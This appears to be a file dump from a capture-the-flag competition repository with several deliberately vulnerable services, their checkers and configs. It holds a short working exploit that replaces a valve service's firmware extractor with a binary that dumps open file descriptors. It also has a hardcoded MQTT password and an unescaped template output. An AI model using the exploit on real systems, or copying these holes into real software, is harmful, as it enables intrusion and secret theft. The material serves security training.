| ); 7 | 8 | CREATE TABLE IF NOT EXISTS messages( 9 | id INTEGER PRIMARY KEY, 10 | link_id INTEGER NOT NULL, 11 | message TEXT, 12 | ts TIMESTAMP, 13 | FOREIGN KEY(link_id) REFERENCES links(id) 14 | ); -------------------------------------------------------------------------------- /dewaste/report_app/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .error { 2 | background-color: rgb(167, 7, 7); 3 | color: #ffffff; 4 | padding: 1rem; 5 | border-radius: 3px; 6 | } -------------------------------------------------------------------------------- /dewaste/report_app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 
5 | 6 | 7 | 8 | DEWASTE - Bug Report App 9 | 10 | 11 |
12 | {% if error %} 13 |

Error: {{ error }}

14 | {% endif %} 15 | {% block content %}{% endblock %} 16 |
17 | 18 | -------------------------------------------------------------------------------- /dewaste/report_app/templates/messages.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} 2 | {% block content %} 3 | {% if not error %} 4 |

Issue #{{ link_uuid }}

5 | {% for message in messages %} 6 |
7 | {{ message.message }} 8 |
9 | Message sent @ {{ message.ts }} 10 |
11 |
12 | {% endfor %} 13 | 14 |
15 | 16 |
17 | {% endif %} 18 | {% endblock %} -------------------------------------------------------------------------------- /dewaste/vulnbot/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/vulnbot/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/vulnbot/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium==4.4.3 2 | Pillow==9.2.0 3 | requests==2.28.1 4 | cffi==1.15.1 5 | cryptography==38.0.1 -------------------------------------------------------------------------------- /dewaste/vulnbot/run_dev.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | docker build -t dewastebot:latest . 5 | docker run -t -i --network=host --env DISPLAY=$DISPLAY --volume $XAUTH:/root/.Xauthority -v $PWD:/checker dewastebot:latest localhost 1 20 6 | -------------------------------------------------------------------------------- /hps/.gitignore: -------------------------------------------------------------------------------- 1 | venv/ 2 | .idea/ 3 | -------------------------------------------------------------------------------- /hps/README.md: -------------------------------------------------------------------------------- 1 | HPS 2 | === 3 | We discovered this hydroelectric power station in the Austrian Alps around 10 years ago. Vegetation took over the buildings, and most systems were unusable due to corrosion. But the massive dam was built to last, not showing cracks or other signs of structural breakdown. We needed clean power, so we started looting other power plants and abandoned factories to repair the damaged equipment. 
4 | 5 | Even if most systems are old and faulty, now the power station represents our only permanent power source that relies entirely on renewable sources. The amount of energy produced is so large that we can even accumulate the surplus for non-essential activities. We also discovered that we could perform cold starts to recover from blackouts by manually forcing the system to open its central valve. -------------------------------------------------------------------------------- /hps/ca_stuff/ca.srl: -------------------------------------------------------------------------------- 1 | B64F785DEDB0B1A6 2 | -------------------------------------------------------------------------------- /hps/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY ca.crt commander.crt commander.key / 11 | RUN chmod +x /checker/checker.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | ENV PYTHONUNBUFFERED=1 15 | WORKDIR /tmp 16 | 17 | # set this to _checker 18 | ENV CTF_SERVICE hps_checker1 19 | -------------------------------------------------------------------------------- /hps/checkers/checker1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 
6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /hps/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | paho-mqtt -------------------------------------------------------------------------------- /hps/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | RUN apt-get update && apt-get install -y zip 9 | COPY checker.py firmware_utils.py firmware_generator.py private.pem /checker/ 10 | COPY ca.crt commander.crt commander.key / 11 | RUN chmod +x /checker/checker.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | ENV PYTHONUNBUFFERED=1 15 | WORKDIR /checker 16 | 17 | # set this to _checker 18 | ENV CTF_SERVICE hps_checker2 19 | -------------------------------------------------------------------------------- /hps/checkers/checker2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 
6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /hps/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | paho-mqtt 3 | tlv8 4 | pycryptodome==3.15.0 -------------------------------------------------------------------------------- /hps/dist/README.md: -------------------------------------------------------------------------------- 1 | # HPS 2 | 3 | ## Flag IDs 4 | 5 | The service has 2 flag stores and does not use flag IDs. 6 | -------------------------------------------------------------------------------- /hps/dist/mqtt/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM eclipse-mosquitto 2 | 3 | COPY mosquitto.conf /mosquitto/config/mosquitto.conf 4 | COPY acls.txt /mosquitto/config/acls.txt 5 | COPY pw.file /mosquitto/config/pw.file 6 | COPY certs /mosquitto/config/certs -------------------------------------------------------------------------------- /hps/dist/mqtt/acls.txt: -------------------------------------------------------------------------------- 1 | # allow read for valve to topic valve/commands 2 | 3 | user valve 4 | topic read valve/commands 5 | topic write valve/status 6 | 7 | # allow read write for everything for commander 8 | user commander 9 | topic readwrite # 10 | 11 | # allow read for smartmeter to topic smartmeter/commands 12 | user smartmeter 13 | topic read smartmeter/commands 14 | topic write smartmeter/status -------------------------------------------------------------------------------- /hps/dist/mqtt/mosquitto.conf: -------------------------------------------------------------------------------- 1 | per_listener_settings true 2 | 3 | 4 | listener 10035 5 | protocol mqtt 6 | allow_anonymous false 7 | acl_file 
/mosquitto/config/acls.txt 8 | password_file /mosquitto/config/pw.file 9 | 10 | 11 | listener 10036 12 | protocol mqtt 13 | cafile /mosquitto/config/certs/ca.crt 14 | certfile /mosquitto/config/certs/server.crt 15 | keyfile /mosquitto/config/certs/server.key 16 | allow_anonymous false 17 | acl_file /mosquitto/config/acls.txt 18 | require_certificate true 19 | use_identity_as_username true -------------------------------------------------------------------------------- /hps/dist/mqtt/pw.file: -------------------------------------------------------------------------------- 1 | # NwdZbbqefnKgXfk7dLmP5LfM 2 | valve:$7$101$UrBtF87Y0LmC/UVz$3Vg0fTmT8UPU9gFFJ7kYbLQ2xYxVxSstBm3NcoeYBRFD5Ow/NtpIR/uN7TUA4hGiaoileo9udsJBCaD20jAcNg== 3 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | COPY requirements.txt /requirements.txt 4 | 5 | RUN pip install -r /requirements.txt 6 | 7 | COPY . /app 8 | 9 | WORKDIR /app 10 | 11 | ENV PYTHONUNBUFFERED=1 12 | RUN mkdir /data && chown -R 1000:1000 /data 13 | RUN useradd -ms /bin/bash user 14 | USER user 15 | 16 | CMD ["bash", "-c", "python3 manage.py migrate && python3 -u manage.py runserver 0.0.0.0:10030 --noreload"] 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/Smartmeter/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/asgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | ASGI config for Smartmeter project. 
3 | 4 | It exposes the ASGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/4.1/howto/deployment/asgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.asgi import get_asgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 15 | 16 | application = get_asgi_application() 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/urls.py: -------------------------------------------------------------------------------- 1 | """Smartmeter URL Configuration 2 | 3 | The `urlpatterns` list routes URLs to views. For more information please see: 4 | https://docs.djangoproject.com/en/4.1/topics/http/urls/ 5 | Examples: 6 | Function views 7 | 1. Add an import: from my_app import views 8 | 2. Add a URL to urlpatterns: path('', views.home, name='home') 9 | Class-based views 10 | 1. Add an import: from other_app.views import Home 11 | 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') 12 | Including another URLconf 13 | 1. Import the include() function: from django.urls import include, path 14 | 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) 15 | """ 16 | from django.contrib import admin 17 | from django.urls import path, include 18 | 19 | urlpatterns = [ 20 | path('admin/', admin.site.urls), 21 | path('', include('web.urls')) 22 | ] 23 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for Smartmeter project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 
5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/4.1/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.wsgi import get_wsgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 15 | 16 | application = get_wsgi_application() 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Django's command-line utility for administrative tasks.""" 3 | import os 4 | import sys 5 | 6 | 7 | def main(): 8 | """Run administrative tasks.""" 9 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 10 | try: 11 | from django.core.management import execute_from_command_line 12 | except ImportError as exc: 13 | raise ImportError( 14 | "Couldn't import Django. Are you sure it's installed and " 15 | "available on your PYTHONPATH environment variable? Did you " 16 | "forget to activate a virtual environment?" 
17 | ) from exc 18 | execute_from_command_line(sys.argv) 19 | 20 | 21 | if __name__ == '__main__': 22 | main() 23 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/requirements.txt: -------------------------------------------------------------------------------- 1 | paho-mqtt 2 | whitenoise 3 | svg.charts 4 | matplotlib 5 | numpy 6 | bokeh 7 | django -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/Px437_IBM_EGA8.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/static/fonts/Px437_IBM_EGA8.otf -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-down-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-down-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-up-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-up-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/hps/dist/smartmeter/static/fonts/checkbox-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/hyphen-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/hyphen-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/left-brace-black.svg: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/left-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/right-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/right-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-100-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-100-grayLight.svg: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-25-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-25-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-75-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-75-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/graph.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | 7 | 17 |
18 |
19 | 20 |
21 | Rendering failed :( 22 |
23 | {% endblock %} 24 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/graph_html.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | {% if messages %} 5 | {% for message in messages %} 6 |
7 | 8 |
9 | {% endfor %} 10 | {% endif %} 11 |
12 | 15 | 16 |
17 | {% endblock %} 18 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | 7 | 17 |
18 |
19 | 20 |
{# NOTE(review): the "safe" filter switches off HTML auto-escaping for "text". The view that supplies "text" is not shown here, so confirm it never carries user-controlled data; otherwise drop the filter and let the template engine escape it. #}
21 | {{ text | safe}} 22 |
23 | {% endblock %} 24 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/warnings.html: -------------------------------------------------------------------------------- 1 | {% if messages %} 2 | {% for message in messages %} 3 |
4 | 5 |
6 | {% endfor %} 7 | {% endif %} -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/web/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/web/migrations/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /hps/dist/valve/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | COPY requirements.txt /requirements.txt 4 | 5 | RUN pip install -r /requirements.txt 6 | 7 | RUN apt-get update && apt-get install -y zip libcap2-bin rsync 8 | 9 | COPY . 
/app 10 | 11 | WORKDIR /app 12 | ENV PYTHONUNBUFFERED=1 13 | 14 | CMD ["bash", "entry.sh"] -------------------------------------------------------------------------------- /hps/dist/valve/commands.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/commands.log -------------------------------------------------------------------------------- /hps/dist/valve/entry.sh: -------------------------------------------------------------------------------- 1 | while true 2 | do 3 | python app.py 4 | done -------------------------------------------------------------------------------- /hps/dist/valve/pcaps/debug.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/pcaps/debug.pcapng -------------------------------------------------------------------------------- /hps/dist/valve/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvZmySkRUrJyvv/xQ9NeG 3 | e3EGPqPVX4EHVn5VES2CKObAi8GLzD/rfWEskYKBVri+sCBNvoaa0l3TNOzUd3Gz 4 | HEKGgawDbVs4OautDDMBsoF3b2nh2msXzW2TF9s2DQH/sWAbznbOqgDbkAwqpa8S 5 | xPWT+P1ABVCJ1nJ1scNpXnY2b6+U+vxt6ouuviuGDMbvkmxsOzNxv77XFNVnnV1O 6 | yC79hA4JMAr2c5L8O1AgR8Xixx21TTynsJi+xrAx3AVgl5Vc3tdOIB20+/9xPZo3 7 | FBrO2mmEsypcXAf/dW2uFbzvL0WIY6UdDLyVOwsK3KaUtFppZROgsNN65wFNc/e5 8 | vwIDAQAB 9 | -----END PUBLIC KEY----- -------------------------------------------------------------------------------- /hps/dist/valve/requirements.txt: -------------------------------------------------------------------------------- 1 | click==8.1.3 2 | Flask==2.2.2 3 | itsdangerous==2.1.2 4 | Jinja2==3.1.2 5 | MarkupSafe==2.1.1 6 | tlv8==0.10.0 7 | Werkzeug==2.2.2 8 | 
pycryptodome==3.15.0 9 | paho-mqtt -------------------------------------------------------------------------------- /hps/dist/valve/settings.py: -------------------------------------------------------------------------------- 1 | 2 | ENABLE_PCAP = False 3 | 4 | MQTT_PASSWORD = "NwdZbbqefnKgXfk7dLmP5LfM" -------------------------------------------------------------------------------- /hps/dist/valve/static/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/static/logo.png -------------------------------------------------------------------------------- /hps/dist/valve/templates/debug.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 |

Create pcap:

5 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/templates/firmware_upgrade.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 |
5 | 6 | 7 | 8 |
9 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/templates/logs.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 |
5 | {{ logs }}
6 |     
7 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/version.py: -------------------------------------------------------------------------------- 1 | VERSION=0.11 2 | HASH="1234567890abcdef1234567890abcdef" -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/a.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | 5 | int main( int argc, char *argv[] ) { 6 | 7 | char buf[50000]; 8 | int fd=0; 9 | for (fd = 3; fd < 110; ++fd){ 10 | read( fd, buf, 50000 ); 11 | printf("fd %d: %s", fd, buf); 12 | } 13 | printf("\n"); 14 | } 15 | -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/a.out -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/b.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/b.out -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/firmware_generator.py: -------------------------------------------------------------------------------- 1 | from firmware_utils import * 2 | 3 | extractor = b""" 4 | #!/bin/bash 5 | echo "Extracting firmware..." 6 | unzip data.zip -d target 7 | cd target 8 | find . 
-type f -exec sha256sum {} \; | sha256sum 9 | """ 10 | 11 | data = open("test_data.zip", "rb").read() 12 | inner_hash = b"d62f1effc7ea8c890f60d9bc37dc5c6b5ade7487b333465c654ced0a25851390" 13 | target = open("test.bin", "wb") 14 | 15 | 16 | packed = pack(extractor, data, inner_hash) 17 | target.write(packed) 18 | target.close() -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/firmware_generator_exploit.py: -------------------------------------------------------------------------------- 1 | import tlv8 2 | 3 | from firmware_utils import * 4 | 5 | extractor = open("a.out", "rb").read() 6 | orig_firmware = open("test.bin", "rb").read() 7 | data = open("test_data2.zip", "rb").read() 8 | 9 | decoded = tlv8.decode(orig_firmware, structure).data 10 | decoded[2] = tlv8.Entry(3, extractor) 11 | #decoded[5] = tlv8.Entry(6, data) 12 | target = open("test_exploit.bin", "wb") 13 | 14 | target.write(tlv8.encode(decoded)) 15 | target.close() -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvZmySkRUrJyvv/xQ9NeG 3 | e3EGPqPVX4EHVn5VES2CKObAi8GLzD/rfWEskYKBVri+sCBNvoaa0l3TNOzUd3Gz 4 | HEKGgawDbVs4OautDDMBsoF3b2nh2msXzW2TF9s2DQH/sWAbznbOqgDbkAwqpa8S 5 | xPWT+P1ABVCJ1nJ1scNpXnY2b6+U+vxt6ouuviuGDMbvkmxsOzNxv77XFNVnnV1O 6 | yC79hA4JMAr2c5L8O1AgR8Xixx21TTynsJi+xrAx3AVgl5Vc3tdOIB20+/9xPZo3 7 | FBrO2mmEsypcXAf/dW2uFbzvL0WIY6UdDLyVOwsK3KaUtFppZROgsNN65wFNc/e5 8 | vwIDAQAB 9 | -----END PUBLIC KEY----- -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/requirements.txt: -------------------------------------------------------------------------------- 1 | tlv8==0.10.0 2 | pycryptodome==3.15.0 
-------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test.bin -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_data.zip -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_data2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_data2.zip -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_exploit.bin -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/version.py: -------------------------------------------------------------------------------- 1 | VERSION=0.13 -------------------------------------------------------------------------------- /hps/hps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/hps.png 
-------------------------------------------------------------------------------- /hps/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=hps 2 | -------------------------------------------------------------------------------- /techbay/backend-rust_code/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk -------------------------------------------------------------------------------- /techbay/backend-rust_code/src/models.rs: -------------------------------------------------------------------------------- 1 | pub mod users; 2 | -------------------------------------------------------------------------------- /techbay/backend-rust_code/src/schema.rs: -------------------------------------------------------------------------------- 1 | table! { 2 | profiles (id) { 3 | id -> Nullable, 4 | username -> Text, 5 | password -> Text, 6 | displayname -> Text, 7 | address -> Nullable, 8 | is_address_public -> Bool, 9 | telephone_number -> Nullable, 10 | is_telephone_number_public -> Bool, 11 | status -> Nullable, 12 | is_status_public -> Bool, 13 | } 14 | } 15 | 16 | allow_tables_to_appear_in_same_query!( 17 | profiles, 18 | ); 19 | -------------------------------------------------------------------------------- /techbay/build_backend-rust.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd backend-rust_code 4 | cargo build --release 5 | cd .. 
6 | cp backend-rust_code/target/release/backend-rust dist/backend-rust/backend-rust 7 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY Gidole-Regular.ttf /checker/Gidole-Regular.ttf 11 | COPY Inconsolata-Regular.ttf /checker/Inconsolata-Regular.ttf 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | 15 | # set this to _checker 16 | ENV CTF_SERVICE techbay_checker1 17 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/Gidole-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/checkers/checker1/Gidole-Regular.ttf -------------------------------------------------------------------------------- /techbay/checkers/checker1/Inconsolata-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/checkers/checker1/Inconsolata-Regular.ttf -------------------------------------------------------------------------------- /techbay/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application 
(from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | 4 | services: 5 | checker: 6 | build: . 
